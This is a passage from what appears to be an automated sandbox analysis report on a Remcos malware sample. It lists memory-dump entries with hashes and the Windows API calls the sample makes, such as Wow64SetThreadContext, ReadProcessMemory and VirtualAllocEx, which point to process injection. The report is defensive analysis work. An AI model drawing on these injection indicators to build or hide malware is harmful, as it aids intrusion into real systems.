                                              • Opcode Fuzzy Hash: ac6c8703c004a632512c5515ca4993b6a17e4c4451f6bde8b4c709c4e36ebeb2
                                              • Instruction Fuzzy Hash: B02105B5900208DFDB10CF9AE884AEEBBF4FB48320F14801AE918A3310D3749945CF61
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074E771E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 21dbfcffbb4186b0a6758451220f52a311b178181a405778da407cf0d3dbceaf
                                              • Instruction ID: 3090e4dbc7779e1d1cdbced8faca347969c3ed0c33c5b2946e7cc1123e8b7a8a
                                              • Opcode Fuzzy Hash: 21dbfcffbb4186b0a6758451220f52a311b178181a405778da407cf0d3dbceaf
                                              • Instruction Fuzzy Hash: 3C2138B6D003098FDB14DFA9C5857EEBBF4EF48224F14842AD559A7240DB789A45CFA0
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074E771E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: f2e5cb912b6f718221e9a713fb3ea000d270337eab30469766aed9ea437e1970
                                              • Instruction ID: ea92b719d3eaed592d3c2a8af235b38c774d628f12faa2b435c4d587ea68b1f2
                                              • Opcode Fuzzy Hash: f2e5cb912b6f718221e9a713fb3ea000d270337eab30469766aed9ea437e1970
                                              • Instruction Fuzzy Hash: 712149B19003098FDB10DFAAC4857EEBBF4EF48224F14842AD559A7340D778A945CFA0
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074E79A8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 31a4f50e8878aa55a232652f021371a01fd4c263641c214f9bba342a371da659
                                              • Instruction ID: af29fbad51b5614e097b51cd717df4c5eb50c8a740563f62225bc4e8018a286e
                                              • Opcode Fuzzy Hash: 31a4f50e8878aa55a232652f021371a01fd4c263641c214f9bba342a371da659
                                              • Instruction Fuzzy Hash: A82139B18003599FDB10DFAAD884BEEFBF5FF48320F54842AE559A7240D7799540CBA1
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0132D677
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: f67e723432cd637140729847a01daff8d689da729b74680b6de910c8ae4436be
                                              • Instruction ID: f0c39ab82cb4e156bda90b7ca8c48a65238ea89db9a32dd9704db3fd3e98a3db
                                              • Opcode Fuzzy Hash: f67e723432cd637140729847a01daff8d689da729b74680b6de910c8ae4436be
                                              • Instruction Fuzzy Hash: 0A21F5B5900219DFDB10CF9AD484ADEFBF4FB48320F14801AE918A3350D374A944CF64
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074E79A8
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: da59c803c1d97505c649230eba06e586e9c4a05e8002ebe4a9e1d7dc7e9999ef
                                              • Instruction ID: 757f614ba74c93def320924a4949b6b6f3e67d0646a543e5f414278e9e12c804
                                              • Opcode Fuzzy Hash: da59c803c1d97505c649230eba06e586e9c4a05e8002ebe4a9e1d7dc7e9999ef
                                              • Instruction Fuzzy Hash: 0B2136B28003099FDB10CFA9C8857EEBBF5FF48320F14842AE558A7244D7799604CBA0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074E77E6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 077d9c3a4dc0eb90d9736234ac08ccee38d1145bf0bd3dd0bf3ef136aebaa82c
                                              • Instruction ID: 1b069a1ab81c198e8fdbc9201ddbb5d00893d6833763fc1a9b57d78af8a00d94
                                              • Opcode Fuzzy Hash: 077d9c3a4dc0eb90d9736234ac08ccee38d1145bf0bd3dd0bf3ef136aebaa82c
                                              • Instruction Fuzzy Hash: D01137768003499FDB10DFAAD844BDFBBF5EF48320F14842AE519A7250C775A540CFA0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074E77E6